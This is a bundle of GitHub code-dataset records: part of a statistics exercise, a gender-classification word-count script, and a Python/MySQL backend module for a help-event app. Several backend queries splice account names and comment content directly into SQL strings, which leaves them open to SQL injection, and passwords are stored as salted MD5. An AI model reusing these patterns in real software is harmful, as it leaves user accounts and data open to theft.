There are more elegant ways to do this\n # for instance by using the .description function of Pandas\n # DataFrames, but I thought this was clearer.\n #\n # In general this is a less good solution though - because it\n # hardcodes information in several places\n n_datasets = len(tnames)\n stats = {'x': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)},\n 'y': {'mean': np.zeros(n_datasets),\n 'median': np.zeros(n_datasets),\n 'std': np.zeros(n_datasets),\n '25%': np.zeros(n_datasets),\n '75%': np.zeros(n_datasets),\n 'max': np.zeros(n_datasets),\n 'min': np.zeros(n_datasets)}}\n\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n stats[key]['mean'][i] = np.mean(var)\n stats[key]['median'][i] = np.median(var)\n stats[key]['std'][i] = np.std(var)\n stats[key]['25%'][i] = np.percentile(var, 25.)\n stats[key]['75%'][i] = np.percentile(var, 75.)\n stats[key]['min'][i] = np.min(var)\n stats[key]['max'][i] = np.max(var)\n \n\n return stats\n\ndef get_statistics_compact(tnames, data):\n \"\"\"\n Equivalent to the above - shorter and a bit more flexible but\n also probably a bit more less clear?\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n\n first = True\n for tn in tnames:\n summary = data[tn].describe()\n\n # If we are doing the first round through we need to create\n # the lists\n todo = summary['x'].keys()\n for key in ('x', 'y'):\n for x_todo in todo:\n if first:\n stats[key][x_todo] = []\n stats[key][x_todo].append(summary[key][x_todo])\n \n first = False\n\n return stats\n\n\ndef get_statistics_extendable(tnames, data, functions=None):\n \"\"\"\n Equivalent to the above two, but this one is more extendible\n\n The functions argument should be an array of functions to\n apply to the data. 
If this is set to None the a default set \n of functions are applied, namely:\n\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n \"\"\"\n\n stats = {'x': dict(), 'y': dict()}\n if functions is None:\n functions = {'mean': np.mean, 'median': np.median,\n '25%': lambda x: np.percentile(x, 25.0),\n '75%': lambda x: np.percentile(x, 75.0)}\n n_datasets = len(tnames)\n first = True\n for i, tn in enumerate(tnames):\n for key in ('x', 'y'):\n var = data[tn][key]\n \n for todo, func in functions.iteritems():\n if first:\n stats[key][todo] = np.zeros(n_datasets)\n stats[key][todo][i] = func(var)\n \n first = False\n\n return stats\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n tnames, data = read_visualisation_data()\n\n show_visualisations_multipanel(tnames, data)\n", "repo_name": "jbrinchmann/MLD2019", "sub_path": "ProblemSets/2 - Inference and Visualisation/Solution/problem2_2.py", "file_name": "problem2_2.py", "file_ext": "py", "file_size_in_byte": 7580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 164, "usage_type": 
"call"}, {"api_name": "numpy.percentile", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.percentile", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}]} +{"seq_id": "13945849021", "text": "import nltk\n\ndef genderDifferencesFeatures(text):\n\n\tgroom = \"\"\"cleaner clean washer wash perfume shave shaved shampoo cleansing soap shower\n\ttoothpaste cream facewash moisturizer nail lipstick makeup\"\"\"\n\n\tsleep = \"\"\"tiresome sleeping dazed sleeps insomnia napping nap siesta nightmare dream dreams bed\n\tpillow\"\"\"\n\n\ti = \"\"\"me myself mine my i\"\"\"\n\n\teating = \"\"\"fat dinner tasting drunken fed breakfast cookie eat tasted skinny cookbook\"\"\"\n\n\tdisgust = \"\"\"sickening revolting horror sick offensive obscene nauseous wicked\"\"\"\n\n\tfear = \"\"\"suspense creep dismay fright terrible terror afraid scare alarmed panicked panic\"\"\"\n\n\tsewing = \"\"\"mending stiching knitting knitter knit mend tailor suture embroidery seamstress needle\"\"\"\n\n\tpurpleness = \"\"\"purple mauve magenta lilac lavender orchid violet mulberry purply\"\"\"\n\n\tsweetness = \"\"\"syrup honey sugar bakery nectar sweet frost sugary dessert glaze nut\"\"\"\n\n\tbrownness = \"\"\"coffee biscuit biscuits walnut rust berry brown brunette cinnamon mahogany caramel chocolate\"\"\"\n\n\tchastity = \"\"\"shame elegant decent virtue virgin delicate faithful faithfulness platonic purity spotless\"\"\"\n\n\trelig = \"\"\"bless satanism angel communion spirit lord immortal theology prayers\"\"\"\n\n\tmetaph = \"\"\"suicide meditation cemetary temples drained immortalized mercy mourning\"\"\"\n\n\ttv = \"\"\"show ad comedies comedy tv actors drama soaps video theatres commercials commercial film films\"\"\"\n\n\tjob = \"\"\"credentials department financials desktop manage employee work career\"\"\"\n\n\toponent = \"\"\"finalist rival enemy competitor foe opposite defendant player dissident\"\"\"\n\n\ttheology = \"\"\"creed scholastic religious secularism theology religion divine faith dogma\"\"\"\n\n\tuniformity = \"\"\"evenness constancy constant persistence accordance steadiness steady firm firmness stable stability\"\"\"\n\n\tengineering = \"\"\"automotive process industrial manufacture measure construction technician\"\"\"\n\n\tinfluence = \"\"\"power force weak weakness inflexible ineffective charisma charm wimpy\"\"\"\n\n\t\n\tcountGroom = countSleep = countI = countEating = countDisgust = countFear = countSewing = 0\n\tcountPurpleness = countSweetness = countBrownness = countChastity = countRelig = countInfluence = 0\n\tcountMetaph = countTV = countJob = countOponent = countTheology = countUniformity = countEngineering = 0\n\n\ttotalWords = len(text.split())\n\t#print(totalWords)\n\n\ttext = text.lower()\n\ttext = nltk.word_tokenize(text)\n\tgroom = nltk.word_tokenize(groom)\n\tsleep = nltk.word_tokenize(sleep)\n\ti = nltk.word_tokenize(i)\n\teating = nltk.word_tokenize(eating)\n\tdisgust = nltk.word_tokenize(disgust)\n\tfear = nltk.word_tokenize(fear)\n\tsewing = nltk.word_tokenize(sewing)\n\tpurpleness = nltk.word_tokenize(purpleness)\n\tsweetness = 
nltk.word_tokenize(sweetness)\n\tbrownness = nltk.word_tokenize(brownness)\n\tchastity = nltk.word_tokenize(chastity)\n\trelig = nltk.word_tokenize(relig)\n\tinfluence = nltk.word_tokenize(influence)\n\tmetaph = nltk.word_tokenize(metaph)\n\ttv = nltk.word_tokenize(tv)\n\tjob = nltk.word_tokenize(job)\n\toponent = nltk.word_tokenize(oponent)\n\ttheology = nltk.word_tokenize(theology)\n\tuniformity = nltk.word_tokenize(uniformity)\n\tengineering = nltk.word_tokenize(engineering)\n\t\n\n\tfor word in text:\n\t\tif word in groom:\n\t\t\tcountGroom += 1\n\n\t\tif word in sleep:\n\t\t\tcountSleep += 1\n\n\t\tif word in i:\n\t\t\tcountI += 1\n\n\t\tif word in eating:\n\t\t\tcountEating += 1\n\n\t\tif word in disgust:\n\t\t\tcountDisgust += 1\n\n\t\tif word in fear:\n\t\t\tcountFear += 1\n\n\t\tif word in sewing:\n\t\t\tcountSewing += 1\n\n\t\tif word in purpleness:\n\t\t\tcountPurpleness += 1\n\n\t\tif word in sweetness:\n\t\t\tcountSweetness += 1\n\n\t\tif word in brownness:\n\t\t\tcountBrownness += 1\n\n\t\tif word in chastity:\n\t\t\tcountChastity += 1\n\n\t\tif word in relig:\n\t\t\tcountRelig += 1\n\n\t\tif word in metaph:\n\t\t\tcountMetaph += 1\n\n\t\tif word in tv:\n\t\t\tcountTV += 1\n\n\t\tif word in job:\n\t\t\tcountJob += 1\n\n\t\tif word in oponent:\n\t\t\tcountOponent += 1\n\n\t\tif word in theology:\n\t\t\tcountTheology += 1\n\n\t\tif word in uniformity:\n\t\t\tcountUniformity += 1\n\n\t\tif word in engineering:\n\t\t\tcountEngineering += 1\n\n\t\tif word in influence:\n\t\t\tcountInfluence += 1\n\n\ttry:\n\t\tcountGroom /= 1.0 * totalWords\n\texcept:\n\t\tcountGroom = 0\n\ttry:\n\t\tcountSleep /= 1.0 * totalWords\n\texcept:\n\t\tcountSleep = 0\n\ttry:\n\t\tcountI /= 1.0\n\texcept:\n\t\tcountI = 0\n\ttry:\n\t\tcountEating /= 1.0 * totalWords\n\texcept:\n\t\tcountEating = 0\n\ttry:\n\t\tcountDisgust /= 1.0 *totalWords\n\texcept:\n\t\tcountDisgust = 0\n\ttry:\n\t\tcountFear /= 1.0 * totalWords\n\texcept:\n\t\tcountFear = 0\n\ttry:\n\t\tcountSewing /= 1.0 * totalWords\n\texcept:\n\t\tcountSewing = 0\n\ttry:\n\t\tcountPurpleness /= 1.0 * totalWords\n\texcept:\n\t\tcountPurpleness = 0\n\ttry:\n\t\tcountBrownness /= 1.0 * totalWords\n\texcept:\n\t\tcountBrownness = 0\n\ttry:\n\t\tcountSweetness /= 1.0 * totalWords\n\texcept:\n\t\tcountSweetness = 0\n\ttry:\n\t\tcountChastity /= 1.0 * totalWords\n\texcept:\n\t\tcountChastity = 0\n\ttry:\n\t\tcountRelig /= 1.0 * totalWords\n\texcept:\n\t\tcountRelig = 0\n\ttry:\n\t\tcountMetaph /= 1.0 * totalWords\n\texcept:\n\t\tcountMetaph = 0\n\ttry:\n\t\tcountJob /= 1.0 * totalWords\n\texcept:\n\t\tcountJob = 0\n\ttry:\n\t\tcountTV /= 1.0 * totalWords\n\texcept:\n\t\tcountTV = 0\n\ttry:\n\t\tcountOponent /= 1.0 * totalWords\n\texcept:\n\t\tcountOponent = 0\n\ttry:\n\t\tcountTheology /= 1.0 * totalWords\n\texcept:\n\t\tcountTheology = 0\n\ttry:\n\t\tcountUniformity /= 1.0 * totalWords\n\texcept:\n\t\tcountUniformity = 0\n\ttry:\n\t\tcountEngineering /= 1.0 * totalWords\n\texcept:\n\t\tcountEngineering = 0\n\ttry:\n\t\tcountInfluence /= 1.0 * totalWords\n\texcept:\n\t\tcountInfluence = 0\n\n\treturn(countGroom, countSleep, countI, countEating, countDisgust, countFear, countSewing, countPurpleness,\n\t\tcountSweetness, countBrownness, countChastity, countRelig, countMetaph, countJob, countTV, countOponent,\n\t\tcountTheology, countUniformity, countEngineering, countInfluence)\n\ntext = \"\"\"This is hopeless countless priceless and I am indecisive. 
so sorry sorry I am feeling terrible \nthat I am unable to fulfil a WONderful TV mathematical brutal vicious terrific problem.\"\"\"\nprint(genderDifferencesFeatures(text))\n", "repo_name": "srvCodes/Gender-Classification-of-Blog-Author", "sub_path": "genderDifferencesFeatures.py", "file_name": "genderDifferencesFeatures.py", "file_ext": "py", "file_size_in_byte": 5904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.word_tokenize", "line_number": 56, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 60, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 61, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 65, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 68, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 69, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 70, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 73, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 75, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "14146794715", "text": "#!/usr/bin/python\n\nimport sys\nimport random\nimport string\nimport hashlib\nimport MySQLdb\nimport ast\n\n\nfrom dbhelper import dbhelper\nfrom utils import KEY\n\n\n \n'''\nadd a new account to database.\n@params a dict data:\n includes account and password.\n@return -1 indicates params are not complete. 
Or account is not unique that leads to database fails.\n other number indicates success and the number is the id of the new account.\n'''\ndef add_account(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return -1\n \n salt = ''.join(random.sample(string.ascii_letters, 8))\n md5_encode = hashlib.md5()\n md5_encode.update(data[KEY.PASSWORD]+salt)\n password = md5_encode.hexdigest()\n sql_account = \"insert into account (account, password, salt) values ('%s', '%s', '%s')\"\n sql_user = \"insert into user (id, nickname) values (%d, '%s')\"\n try:\n insert_id = dbhelper.insert(sql_account%(data[KEY.ACCOUNT], password, salt))\n dbhelper.insert(sql_user%(insert_id, data[KEY.ACCOUNT]))\n return insert_id\n except:\n return -1\n\n\n'''\nupdate information of an account.\n@params a dict data:\n includes id and chat_token:\n@return True if successfully modify chat_token\n False modification fails.\n'''\ndef update_account(data):\n if KEY.ID in data and KEY.CHAT_TOKEN in data:\n sql = \"update account set chat_token = '%s' where id = %d\"\n try:\n if dbhelper.execute(sql%(data[KEY.CHAT_TOKEN], data[KEY.ID])) > 0:\n return True\n except:\n return False\n else:\n return False\n\n\n'''\nmodify user's information.\n@params a dict data:\n options include user's name, nickname, gender, age, phone, location,\n (longitude and latitude), occupation, identity_id.\n@return True if successfully modify\n False modification fails.\n'''\ndef update_user(data):\n if KEY.ID not in data:\n return False\n result = True\n \n sql = \"\"\n if KEY.NAME in data:\n data[KEY.NAME] = MySQLdb.escape_string(data[KEY.NAME].encode(\"utf8\"))\n sql = \"update user set name = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.NICKNAME in data:\n data[KEY.NICKNAME] = MySQLdb.escape_string(data[KEY.NICKNAME].encode(\"utf8\"))\n sql = \"update user set nickname = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NICKNAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.GENDER in data:\n sql = \"update user set gender = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.GENDER], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.AGE in data:\n sql = \"update user set age = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.AGE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n \n if KEY.PHONE in data:\n sql = \"update user set phone = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.PHONE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LOCATION in data:\n data[KEY.LOCATION] = MySQLdb.escape_string(data[KEY.LOCATION].encode(\"utf8\"))\n sql = \"update user set location = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LOCATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update user set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n elif not (KEY.LONGITUDE not in data and KEY.LATITUDE not in data):\n result &= False\n\n if KEY.OCCUPATION in data:\n sql = \"update user set occupation = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.OCCUPATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.IDENTITY_ID in data:\n sql = \"update user set identity_id = '%s' 
where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.IDENTITY_ID], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nget salt of an account.\n@params include user's account.\n@return salt of an account.\n None if account not exists or database query error.\n'''\ndef get_salt(data):\n if KEY.ACCOUNT not in data:\n return None\n sql = \"select salt from account where account = '%s'\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT]))\n if res is None:\n return None\n else:\n return res[0]\n except:\n return None\n\n\n'''\nvalidate whether password is correct.\n@params includes user's account and password.\n password need to be md5 encode.\n@return user's id if password is correct.\n -1 otherwise.\n'''\ndef validate_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data or KEY.SALT not in data:\n return -1\n sql = \"select id, password from account where account = '%s' and salt = '%s'\"\n user_id = -1\n password = None\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT], data[KEY.SALT]))\n if res is not None:\n user_id = res[0]\n password = res[1]\n except:\n pass\n finally:\n if password is None or data[KEY.PASSWORD] is None:\n return -1\n elif password == data[KEY.PASSWORD]:\n return user_id\n else:\n return -1\n\n\n'''\nmodify user's password to a new one, but not modify its salt value.\n@params include user's account. \n new password that encode with salt by md5.\n@return true if successfully modify.\n false otherwise.\n'''\ndef modify_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return False\n sql = \"update account set password = '%s' where account = '%s'\" \n try:\n n = dbhelper.execute(sql%(data[KEY.PASSWORD], data[KEY.ACCOUNT]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n \n \n'''\nget user's information, which includes user's name, nickname, gender ...... 
.\n@params include user's id.\n@return a json includes user's concrete information.\n None if params error or database query error.\n'''\ndef get_user_information(data):\n if KEY.ID not in data:\n return None\n sql = \"select * from user where id = %d\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ID]))\n if res is None:\n return None\n else:\n user = {}\n user[KEY.ID] = res[0]\n user[KEY.NAME] = res[1]\n user[KEY.NICKNAME] = res[2]\n user[KEY.GENDER] = res[3]\n user[KEY.AGE] = res[4]\n user[KEY.PHONE] = res[5]\n user[KEY.LOCATION] = res[6]\n user[KEY.LONGITUDE] = float(res[7])\n user[KEY.LATITUDE] = float(res[8])\n user[KEY.OCCUPATION] = res[9]\n user[KEY.REPUTATION] = float(res[10])\n user[KEY.IDENTITY_ID] = res[12]\n user[KEY.IS_VERIFY] = res[14]\n return user\n except:\n return None\n\n\n'''\nlaunch a help event by launcher.\n@params includes user's id and type of help event.\n help event types:\n 0 represents normal question.\n 1 represents nornal help.\n 2 represents emergency.\n other option params includes content of event, longitude and latitude of event.\n@return event_id if successfully launches.\n -1 if fails.\n'''\ndef add_event(data): \n if KEY.ID not in data or KEY.TYPE not in data:\n return -1\n sql = \"insert into event (launcher, type, time) values (%d, %d, now())\"\n event_id = -1\n try:\n event_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE]))\n if event_id > 0:\n data[KEY.EVENT_ID] = event_id\n update_event(data)\n return event_id\n except:\n return -1\n\n\n'''\nmodify information of a help event.\n@params includes event_id, which is id of the event to be modified.\n option params includes: content of event, longitude and latitude of event, state of event.\n@return True if successfully modifies.\n False otherwise.\n'''\ndef update_event(data):\n result = True\n sql = \"\"\n if KEY.CONTENT in data:\n data[KEY.CONTENT] = MySQLdb.escape_string(data[KEY.CONTENT].encode(\"utf8\"))\n sql = \"update event set content = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.CONTENT], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n \n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update event set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n if KEY.STATE in data:\n if data[KEY.STATE] == 0:\n data[KEY.STATE] = 1\n sql = \"update event set state = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.STATE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nremove a help event by event launcher.\n@params includes user's id, which is remover. 
Actually, only the launcher can remove his/her event.\n event's id, which represents the event to be removed.\n@return True if successfully removes, or remover is not the launcher, actually nothing happens.\n False if fails.\n'''\ndef remove_event(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n sql = \"delete from event where id = %d and launcher = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget information of a help event.\n@params includes id of the event to get.\n@return concrete information of the event:\n event_id, launcher's id and his/her nickname, content, type, time, longitude and latitude, state, number of followers, number of supporters and group points.\n None indicates fail query.\n'''\ndef get_event_information(data):\n if KEY.EVENT_ID not in data:\n return None\n event_info = None\n sql = \"select * from event where id = %d\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n event_info = {}\n event_info[KEY.EVENT_ID] = sql_result[0]\n event_info[KEY.LAUNCHER_ID] = sql_result[1]\n event_info[KEY.CONTENT] = sql_result[2]\n event_info[KEY.TYPE] = sql_result[3]\n event_info[KEY.TIME] = str(sql_result[4])\n event_info[KEY.LONGITUDE] = float(sql_result[5])\n event_info[KEY.LATITUDE] = float(sql_result[6])\n event_info[KEY.STATE] = sql_result[7]\n event_info[KEY.FOLLOW_NUMBER] = sql_result[8]\n event_info[KEY.SUPPORT_NUMBER] = sql_result[9]\n event_info[KEY.GROUP_PTS] = float(sql_result[10])\n user = {}\n user[KEY.ID] = event_info[KEY.LAUNCHER_ID]\n user = get_user_information(user)\n if user is not None:\n event_info[KEY.LAUNCHER] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return event_info\n\n\n'''\nget information of a collection of events.\n@params includes data, a json that contains user's id and type of events to get.\n get_event_id_list a method of getting event id list.\n@return a array of events. 
each element is information of an event in json form.\n'''\ndef get_events(data, get_event_id_list):\n event_id_list = get_event_id_list(data)\n event_list = []\n event_info = {}\n for event_id in event_id_list:\n event_info[KEY.EVENT_ID] = event_id\n event_info = get_event_information(event_info)\n if event_info is not None:\n event_list.append(event_info)\n return event_list\n\n\n'''\nget events that launch by user.\n@params includes user's id, \n option params includes state indicates all events or those starting or ended.\n type indicates type of events.\n@return an array of result event ids.\n'''\ndef get_launch_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select id from event where launcher = %d\"%data[KEY.ID]\n if KEY.STATE in data:\n if data[KEY.STATE] == 0 or data[KEY.STATE] == 1: \n sql += \" and state = %d\"%data[KEY.STATE]\n if KEY.TYPE in data:\n if data[KEY.TYPE] >= 0 and data[KEY.TYPE] <= 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nget user's follow or support events.\n@params includes user's id and type of user's state in event.\n user's state 0 indicates follow, and 1 indicates support.\n@return an array of result event ids.\n'''\ndef get_join_event_list(data):\n event_id_list = []\n if KEY.ID not in data:\n return event_id_list\n sql = \"select event_id from support_relation where supporter = %d\"%data[KEY.ID]\n if KEY.TYPE in data:\n if data[KEY.TYPE] == 1 or data[KEY.TYPE] == 2:\n sql += \" and type = %d\"%data[KEY.TYPE]\n sql += \" order by time DESC\"\n sql_result = dbhelper.execute_fetchall(sql)\n for each_result in sql_result:\n for each_id in each_result:\n event_id_list.append(each_id)\n\n return event_id_list\n\n\n'''\nmanage relation of user and event.\n@params\n@return\n'''\ndef user_event_manage(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.OPERATION not in data:\n return True\n if data[KEY.OPERATION] < 0 or data[KEY.OPERATION] > 2:\n return False\n sql = \"select launcher from event where id = %d\"\n launcher_id = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n launcher_id = sql_result[0]\n except:\n pass\n if launcher_id is None:\n return False\n if data[KEY.OPERATION] == 0:\n sql = \"delete from support_relation where event_id = %d and supporter = %d\"%(data[KEY.EVENT_ID], data[KEY.ID])\n else:\n sql = \"replace into support_relation (event_id, supportee, supporter, type, time) values (%d, %d, %d, %d, now())\"%(data[KEY.EVENT_ID], launcher_id, data[KEY.ID], data[KEY.OPERATION])\n try:\n dbhelper.execute(sql)\n except:\n return False\n\n #\n # trust and reputation compute here.\n #\n return True\n\n\n'''\nadd a new comment to a help event.\n@params includes event_id, represents comment belongs to which event,\n author, user's id, author of comment,\n content, content of comment.\n@return new comment id if succeed,\n -1 otherwise.\n'''\ndef add_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return -1\n if KEY.CONTENT not in data:\n return -1\n sql = \"insert into comment (event_id, author, content, time) values (%d, %d, '%s', now())\"\n try:\n comment_id = dbhelper.insert(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.CONTENT]))\n return comment_id\n except:\n return 
-1\n\n\n'''\nremove a comment from a help event by author him/her self.\n@params includes id, indicates author him/her self.\n event_id, indicates which event the comment belongs to.\n comment_id, indicates comment itself.\n@return True if delete successfully,\n False if fails.\n'''\ndef remove_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data or KEY.COMMENT_ID not in data:\n return False\n sql = \"delete from comment where id = %d and event_id = %d and author = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.COMMENT_ID], data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget comments of a help event.\n@params event_id, id of the help event.\n@return a list of comments. each comment contain all detail information.\n'''\ndef get_comments(data):\n if KEY.EVENT_ID not in data:\n return None\n comment_list = []\n comment = {}\n sql = \"select id from comment where event_id = %d order by time DESC\"\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.EVENT_ID]))\n for each_result in sql_result:\n for each_id in each_result:\n comment[KEY.COMMENT_ID] = each_id\n comment = get_comment_info(comment)\n if comment is not None:\n comment_list.append(comment)\n return comment_list\n except:\n return None\n\n\n'''\nget detail information of a comment.\n@params includes comment_id, id of comment.\n@return information of comment, includes id of comment,\n event_id, indicates which event belongs to,\n author_id, author's user id,\n author, nickname of author,\n content, main body of comment,\n time, add time of comment.\n None indicates a fail query. Maybe the chosen comment doesn't exist.\n'''\ndef get_comment_info(data):\n if KEY.COMMENT_ID not in data:\n return None\n sql = \"select event_id, author, content, time from comment where id = %d\"\n comment_info = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.COMMENT_ID]))\n if sql_result is not None:\n comment_info = {}\n comment_info[KEY.COMMENT_ID] = data[KEY.COMMENT_ID]\n comment_info[KEY.EVENT_ID] = sql_result[0]\n comment_info[KEY.AUTHOR_ID] = sql_result[1]\n comment_info[KEY.CONTENT] = sql_result[2]\n comment_info[KEY.TIME] = str(sql_result[3])\n user = {}\n user[KEY.ID] = comment_info[KEY.AUTHOR_ID]\n user = get_user_information(user)\n if user is not None:\n comment_info[KEY.AUTHOR] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return comment_info\n\n\n'''\nadd a static relation between two users. The relation is single direction.\n@params includes two users' id, one is called id, the other called user_id.\nparameter type indicates type of static relation. 
